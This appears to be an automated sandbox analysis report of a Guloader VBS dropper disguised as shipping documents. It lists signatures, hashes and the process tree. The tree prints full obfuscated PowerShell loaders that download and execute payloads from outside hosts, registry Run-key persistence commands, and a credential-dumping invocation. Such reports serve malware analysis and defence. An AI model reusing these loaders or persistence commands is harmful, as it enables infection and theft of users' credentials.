Analysis

  • max time kernel
    138s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/07/2024, 03:08

General

  • Target

    waybill_shipping_documents_original_BL_CI&PL_03_07_2024_00000000_doc.vbs

  • Size

    26KB

  • MD5

    503813637a43724a817bf18d9f8b6610

  • SHA1

    c44800bcab2246b8cea09d9c8e8b56d461a634cc

  • SHA256

    027478d4f38530836abfa6819748b88b4b540d0a27090903d697a5d3e555535e

  • SHA512

    486ac7e3b46725c0da9f27051d6b657a59746a99d2788ccf971096ab8b920dcb3547acc320ca83d064a639694f992b917705bfb839729ac3473237a12ce2bb4e

  • SSDEEP

    384:VBlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgww74LKQKhOAp:ZzSR022X/523S0e8xPPm+Tmq5qPtxhgz

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\waybill_shipping_documents_original_BL_CI&PL_03_07_2024_00000000_doc.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1140
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Iliocaudal66 glug ekslibrisenes Unstooped Feverweed Regnvaad Autolycus Revsedes fishpotter Identitetsantagelsens tilrettelagt Separationsbevillingens Oratoriers Kunstanmeldelsen Bjergets Erhversevne Groovy Donkeywork Pyrenopeziza Fluefangernes Skakbrikkernes92 Pleasantish indbrnder Bevaringsforeninger Iliocaudal66 glug ekslibrisenes Unstooped Feverweed Regnvaad Autolycus Revsedes fishpotter Identitetsantagelsens tilrettelagt Separationsbevillingens Oratoriers Kunstanmeldelsen Bjergets Erhversevne Groovy Donkeywork Pyrenopeziza Fluefangernes Skakbrikkernes92 Pleasantish indbrnder Bevaringsforeninger';If (${host}.CurrentCulture) {$Reaktionsdrevet++;}Function Livsforsikringer($Pacesetter){$Ascendentens=$Pacesetter.Length-$Reaktionsdrevet;$Lexicographic184='SUBsTRI';$Lexicographic184+='ng';For( $Tootsies82=1;$Tootsies82 -lt $Ascendentens;$Tootsies82+=2){$Iliocaudal66+=$Pacesetter.$Lexicographic184.Invoke( $Tootsies82, $Reaktionsdrevet);}$Iliocaudal66;}function Knucks($Derrik){ & ($Paasttelses) ($Derrik);}$Afbankningers=Livsforsikringer ' MOo z i,l.lTa / 5R.,0 .(BWSi nUd oTw sO N,T .1N0 ..0M;, .W,iMnR6 4P;. xC6T4,;. r.vT:S1E2R1 ..0.)V .G,eVcPk o,/ 2R0s1i0d0 1F0 1 SF iDr eEfPoRx /Q1A2N1 .U0 ';$Cornmonger=Livsforsikringer ' U.s eCrU-.ABg enn t. ';$Feverweed=Livsforsikringer 'ShKtNtNp.s,:,/P/,k i.pHePlS.Sc.oRm,..bVrB/A.SwHe l lA- kcnToAw nL/Ap.kAiA- vFa lIi d aOt i oBn /,t,8.XML b./.m x./.P aAg aOjReRn,sS. aIcDa.> h tSt.pEsD:G/,/AaSs,oUc i a t i aStMrHa.dSiGtFi iumPa r ibaU.,r,o / PEa g aBjTeFn,sH. aGc.aP ';$Semidiapente=Livsforsikringer 'C>U ';$Paasttelses=Livsforsikringer 'DiAeUxu ';$stedfortrderne='Revsedes';$Stinksvamp = Livsforsikringer ',e cChSo. G%Ua p pHd aKt aF%I\FE nFeRr,g i eBr n.eC.sB o r ,& & BeMcSh.o, .tA ';Knucks (Livsforsikringer ' $ g lDo,bDaAlC: DRa nDsIe m u s.iPk.=C(AcSmRdS A/ c. c$.S.tRiDn,k spvTa m pB), ');Knucks (Livsforsikringer '.$Rg,lKoKb aPlS: UCnEs t.o oGpAeGd.=u$,FSe,vDehr w e e,d,.,sBpSlCiStS(H$.S eUmMiUdAi a,p eEn.tTe )N ');Knucks (Livsforsikringer ' [.N,eDt .SS.e,r vTiWc e.PSo i nBtHMTa,nDa.g e r ].: :ASTe c,u r iGt ySP rFoIt.o c.oAlB ,=, [TN e tD.SSWe.cCu r.iFt.y PUr oKtPoKc,oTlETSy p.eR] :,:FT lUs 1D2E ');$Feverweed=$Unstooped[0];$Guruships232= (Livsforsikringer 'D$Sg l,oVbSa l :OBOu m p k iRnDsP3.1.=PN,e,wC-.OAbSjMeGc t .S,yTsUtJe mP.VN.e tC.OW e b C,lHiUeVn t');$Guruships232+=$Dansemusik[1];Knucks ($Guruships232);Knucks (Livsforsikringer 'C$MB,uSm pMk.i n,s,3T1L.,H.e aSdOeOrPs [ $,C,o,rGncmGoFn gSe r ],=.$SADfAb,aIn.k nAi.nFg e r s ');$Preponderating=Livsforsikringer 'T$NB.uTmNp kMiFn sF3O1S.BDSoBwrndl oFa dEF i,l eD(P$ F ecvye rKw e,eOdW,P$ PVl,e a.sgatn t,iUsfhD) ';$Pleasantish=$Dansemusik[0];Knucks (Livsforsikringer 'A$SgRlPo b a l : DSiLa s,t efm,ar= (UT.e.sAt.-,PTa tThN $uPAlBePaRs a.nSt iis,hB). ');while (!$Diastema) {Knucks (Livsforsikringer 'r$DgKlSoMbSaSlS:.F r i s k i.n,e.sTs.eFs =d$.t rIuTeM ') ;Knucks $Preponderating;Knucks (Livsforsikringer ',S tUa rTtU-.SCl,eAe p 4 ');Knucks (Livsforsikringer 'L$,gBlEoObSaSl :BD,iAaCs t,eRm.a = ( T eRsCt -UPSa.t h. $ PTl e,aUsHasnEt iRsAh.)A ') ;Knucks (Livsforsikringer 'L$.g lEo bNaAlE: eWk,sOl i.bbr i.sIeBn.eOs,=T$UgUl oHb.aIlU:.gKlFu.g +N+ %.$OU,nCsUt.oUo.pTe d ..cAo.u.nRto ') ;$Feverweed=$Unstooped[$ekslibrisenes];}$Defector=324114;$Lamelloid=25357;Knucks (Livsforsikringer ' $ gTl,oSbPa lP:Sf iSs.h p o tRtFe rK E= GSeDtB-mC oOnMtAeDn,tD S$ PMl eEaSs,aHn,tEiUs h. ');Knucks (Livsforsikringer 'F$VgdlHo bsa.lS:.MOaGnRq upeTeU = M[.SNymsAtUeBmA. CBo n,vGeor.t.]S: :CF rSorm B aBsUeH6.4HS tFrMi ndg,(.$.fai.s,hkp o,tStbe.rP)F ');Knucks (Livsforsikringer 'V$TgSl o bSaEl,:PS eEpEaArRa,t iIosn sPbPe v iUlMl isnBg e n s =. [sS y s t e m..,T,e xBtm.REFn.cioSd.iNn gE]L:B: A SSCPI I,.,G.eAt,S.tBrRiVnKg (.$hMOa nZq u,e.e ) ');Knucks (Livsforsikringer ' $ gOlDoUbFa lI:.H,uPs hEoSlOd nCi nSgAs b ufd.gVeFt tJe.r sT= $OS.eCpDaIr.a t isoCnAs bKeMv.i,l lIiUn.g eAnLs.. sSu.b sMtFrui nSgC(,$.D,e,fFe cBt o.rF,I$TLBa.mKeDlAl.oci.dG)U ');Knucks $Husholdningsbudgetters;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2684
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Energierne.Bor && echo t"
        3⤵
          PID:5032
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Iliocaudal66 glug ekslibrisenes Unstooped Feverweed Regnvaad Autolycus Revsedes fishpotter Identitetsantagelsens tilrettelagt Separationsbevillingens Oratoriers Kunstanmeldelsen Bjergets Erhversevne Groovy Donkeywork Pyrenopeziza Fluefangernes Skakbrikkernes92 Pleasantish indbrnder Bevaringsforeninger Iliocaudal66 glug ekslibrisenes Unstooped Feverweed Regnvaad Autolycus Revsedes fishpotter Identitetsantagelsens tilrettelagt Separationsbevillingens Oratoriers Kunstanmeldelsen Bjergets Erhversevne Groovy Donkeywork Pyrenopeziza Fluefangernes Skakbrikkernes92 Pleasantish indbrnder Bevaringsforeninger';If (${host}.CurrentCulture) {$Reaktionsdrevet++;}Function Livsforsikringer($Pacesetter){$Ascendentens=$Pacesetter.Length-$Reaktionsdrevet;$Lexicographic184='SUBsTRI';$Lexicographic184+='ng';For( $Tootsies82=1;$Tootsies82 -lt $Ascendentens;$Tootsies82+=2){$Iliocaudal66+=$Pacesetter.$Lexicographic184.Invoke( $Tootsies82, $Reaktionsdrevet);}$Iliocaudal66;}function Knucks($Derrik){ & ($Paasttelses) ($Derrik);}$Afbankningers=Livsforsikringer ' MOo z i,l.lTa / 5R.,0 .(BWSi nUd oTw sO N,T .1N0 ..0M;, .W,iMnR6 4P;. xC6T4,;. r.vT:S1E2R1 ..0.)V .G,eVcPk o,/ 2R0s1i0d0 1F0 1 SF iDr eEfPoRx /Q1A2N1 .U0 ';$Cornmonger=Livsforsikringer ' U.s eCrU-.ABg enn t. ';$Feverweed=Livsforsikringer 'ShKtNtNp.s,:,/P/,k i.pHePlS.Sc.oRm,..bVrB/A.SwHe l lA- kcnToAw nL/Ap.kAiA- vFa lIi d aOt i oBn /,t,8.XML b./.m x./.P aAg aOjReRn,sS. aIcDa.> h tSt.pEsD:G/,/AaSs,oUc i a t i aStMrHa.dSiGtFi iumPa r ibaU.,r,o / PEa g aBjTeFn,sH. aGc.aP ';$Semidiapente=Livsforsikringer 'C>U ';$Paasttelses=Livsforsikringer 'DiAeUxu ';$stedfortrderne='Revsedes';$Stinksvamp = Livsforsikringer ',e cChSo. G%Ua p pHd aKt aF%I\FE nFeRr,g i eBr n.eC.sB o r ,& & BeMcSh.o, .tA ';Knucks (Livsforsikringer ' $ g lDo,bDaAlC: DRa nDsIe m u s.iPk.=C(AcSmRdS A/ c. c$.S.tRiDn,k spvTa m pB), ');Knucks (Livsforsikringer '.$Rg,lKoKb aPlS: UCnEs t.o oGpAeGd.=u$,FSe,vDehr w e e,d,.,sBpSlCiStS(H$.S eUmMiUdAi a,p eEn.tTe )N ');Knucks (Livsforsikringer ' [.N,eDt .SS.e,r vTiWc e.PSo i nBtHMTa,nDa.g e r ].: :ASTe c,u r iGt ySP rFoIt.o c.oAlB ,=, [TN e tD.SSWe.cCu r.iFt.y PUr oKtPoKc,oTlETSy p.eR] :,:FT lUs 1D2E ');$Feverweed=$Unstooped[0];$Guruships232= (Livsforsikringer 'D$Sg l,oVbSa l :OBOu m p k iRnDsP3.1.=PN,e,wC-.OAbSjMeGc t .S,yTsUtJe mP.VN.e tC.OW e b C,lHiUeVn t');$Guruships232+=$Dansemusik[1];Knucks ($Guruships232);Knucks (Livsforsikringer 'C$MB,uSm pMk.i n,s,3T1L.,H.e aSdOeOrPs [ $,C,o,rGncmGoFn gSe r ],=.$SADfAb,aIn.k nAi.nFg e r s ');$Preponderating=Livsforsikringer 'T$NB.uTmNp kMiFn sF3O1S.BDSoBwrndl oFa dEF i,l eD(P$ F ecvye rKw e,eOdW,P$ PVl,e a.sgatn t,iUsfhD) ';$Pleasantish=$Dansemusik[0];Knucks (Livsforsikringer 'A$SgRlPo b a l : DSiLa s,t efm,ar= (UT.e.sAt.-,PTa tThN $uPAlBePaRs a.nSt iis,hB). ');while (!$Diastema) {Knucks (Livsforsikringer 'r$DgKlSoMbSaSlS:.F r i s k i.n,e.sTs.eFs =d$.t rIuTeM ') ;Knucks $Preponderating;Knucks (Livsforsikringer ',S tUa rTtU-.SCl,eAe p 4 ');Knucks (Livsforsikringer 'L$,gBlEoObSaSl :BD,iAaCs t,eRm.a = ( T eRsCt -UPSa.t h. $ PTl e,aUsHasnEt iRsAh.)A ') ;Knucks (Livsforsikringer 'L$.g lEo bNaAlE: eWk,sOl i.bbr i.sIeBn.eOs,=T$UgUl oHb.aIlU:.gKlFu.g +N+ %.$OU,nCsUt.oUo.pTe d ..cAo.u.nRto ') ;$Feverweed=$Unstooped[$ekslibrisenes];}$Defector=324114;$Lamelloid=25357;Knucks (Livsforsikringer ' $ gTl,oSbPa lP:Sf iSs.h p o tRtFe rK E= GSeDtB-mC oOnMtAeDn,tD S$ PMl eEaSs,aHn,tEiUs h. ');Knucks (Livsforsikringer 'F$VgdlHo bsa.lS:.MOaGnRq upeTeU = M[.SNymsAtUeBmA. CBo n,vGeor.t.]S: :CF rSorm B aBsUeH6.4HS tFrMi ndg,(.$.fai.s,hkp o,tStbe.rP)F ');Knucks (Livsforsikringer 'V$TgSl o bSaEl,:PS eEpEaArRa,t iIosn sPbPe v iUlMl isnBg e n s =. [sS y s t e m..,T,e xBtm.REFn.cioSd.iNn gE]L:B: A SSCPI I,.,G.eAt,S.tBrRiVnKg (.$hMOa nZq u,e.e ) ');Knucks (Livsforsikringer ' $ gOlDoUbFa lI:.H,uPs hEoSlOd nCi nSgAs b ufd.gVeFt tJe.r sT= $OS.eCpDaIr.a t isoCnAs bKeMv.i,l lIiUn.g eAnLs.. sSu.b sMtFrui nSgC(,$.D,e,fFe cBt o.rF,I$TLBa.mKeDlAl.oci.dG)U ');Knucks $Husholdningsbudgetters;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1956
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Energierne.Bor && echo t"
            4⤵
              PID:3372
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Drops file in Program Files directory
              • Modifies registry class
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4324
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Trancetilstanden" /t REG_EXPAND_SZ /d "%Steren% -w 1 $Fdevaregrossister=(Get-ItemProperty -Path 'HKCU:\Opbygningsfases\').Assertorially;%Steren% ($Fdevaregrossister)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2156
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Trancetilstanden" /t REG_EXPAND_SZ /d "%Steren% -w 1 $Fdevaregrossister=(Get-ItemProperty -Path 'HKCU:\Opbygningsfases\').Assertorially;%Steren% ($Fdevaregrossister)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:5068
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Poodle.vbs"
                5⤵
                • Checks computer location settings
                • Suspicious use of WriteProcessMemory
                PID:1608
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
                  6⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4260
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
                    7⤵
                      PID:2068
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
                      7⤵
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1328
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
                        8⤵
                          PID:2412
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe"
                          8⤵
                            PID:3788
                          • C:\Program Files (x86)\windows mail\wab.exe
                            "C:\Program Files (x86)\windows mail\wab.exe"
                            8⤵
                              PID:1240
                            • C:\Program Files (x86)\windows mail\wab.exe
                              "C:\Program Files (x86)\windows mail\wab.exe"
                              8⤵
                              • Suspicious use of NtCreateThreadExHideFromDebugger
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:2636
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"
                                9⤵
                                  PID:3876
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"
                                    10⤵
                                    • Adds Run key to start application
                                    • Modifies registry key
                                    PID:4668
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\czqcolh"
                          5⤵
